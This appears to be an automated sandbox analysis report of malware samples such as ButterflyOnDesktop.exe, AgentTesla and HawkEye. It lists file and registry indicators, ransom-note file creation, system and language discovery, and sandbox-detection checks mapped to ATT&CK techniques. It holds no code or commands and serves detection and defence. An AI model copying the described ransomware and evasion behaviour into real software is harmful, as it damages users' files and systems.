File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\cloud_secured.png	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-96.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-80_altform-unplated.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-hover.svg	ButterflyOnDesktop.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\Square150x150Logo.scale-200.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSplashLogo.scale-150.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-80_altform-unplated.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-256_altform-unplated.png	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_ie8.gif	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	ButterflyOnDesktop.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\ui-strings.js	ButterflyOnDesktop.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

IEXPLORE.EXEsledge.dev-esx-qb-converter.exesledge.dev-esx-qb-converter.exeAgentTesla.exebutterflyondesktop.exebutterflyondesktop.tmpButterflyOnDesktop.exeHawkEye.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sledge.dev-esx-qb-converter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sledge.dev-esx-qb-converter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentTesla.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	butterflyondesktop.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	butterflyondesktop.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ButterflyOnDesktop.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HawkEye.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

iexplore.exeDiagnosticsHub.StandardCollector.Service.exeWINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	iexplore.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	iexplore.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	iexplore.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	DiagnosticsHub.StandardCollector.Service.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	DiagnosticsHub.StandardCollector.Service.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exemsedge.exeiexplore.exeWINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	iexplore.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 52 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeiexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000068fd66d6220e584abe447a4e1268eb51000000000200000000001066000000010000200000008b140d5119aafd80bf64afe371ed98ed2e79af0ebb18adb826708294f3dfda93000000000e8000000002000020000000e718204abe28cc047fbfb7e95bd716aaf85529f51e545e4e6540de67ec311e3f20000000d37bc0ef4bd18043d9108a6028c39f57877770b94c8ec0053925fff64d553d6e40000000c1c49227bdb0d1ffee1368e9cf1813aafdaa34f5359d2029d0efce855f47fb95eaa0efaa8df29ca53be1151c8e2991157569b6bf623724d02b0acda3af479a93	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\F12\DockStateChanged = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31132812"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2842522275"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2842522275"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{D4CD1E6F-787F-11EF-B1C5-5E50324ADEFE} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132812"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000068fd66d6220e584abe447a4e1268eb51000000000200000000001066000000010000200000004eb15744ea2e6754f74ce31b53167c199f8cb2ba0afb7a4331e0e6ee59379c23000000000e8000000002000020000000fbd74ad96521d4e0eb9656ccafbce6b7c93ba02ecc9ff82e6e2ed29795749800200000002591ae3895f92c54160ce16702964c73e0fcb90b586c7c182cf60b3dde78e14e40000000e22eeca541e9adbe2d0f5979cabca1c95e30fdee1ca039171a69da46c1390543fcf325d9eef5344ee2f4165c200134308041f7378cdf09d1185c2423de35e2b0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2843150609"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "433732564"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\International	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Main\SuppressScriptDebuggerDialog = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\Toolbar	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31132812"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\F12	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\International\CNum_CpCache = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31132812"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2843160103"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\International\CpCache = e9fd0000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b041f9ad8c0cdb01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 7087fdad8c0cdb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe

Modifies data under HKEY_USERS 17 IoCs

Processes:

LogonUI.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "242"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133714407136362025"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe

Modifies registry class 64 IoCs

Processes:

sledge.dev-esx-qb-converter.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	sledge.dev-esx-qb-converter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\MRUListEx = ffffffff	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000000000002000000ffffffff	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe1100000013908f63d7e4da018f7385c98b0cdb0157c418d08b0cdb0114000000	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	sledge.dev-esx-qb-converter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	sledge.dev-esx-qb-converter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e80922b16d365937a46956b92703aca08af260001002600efbe1100000013908f63d7e4da01b64c19f5dfe4da01d8254ffddfe4da0114000000	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	sledge.dev-esx-qb-converter.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	sledge.dev-esx-qb-converter.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	sledge.dev-esx-qb-converter.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	sledge.dev-esx-qb-converter.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents"	sledge.dev-esx-qb-converter.exe
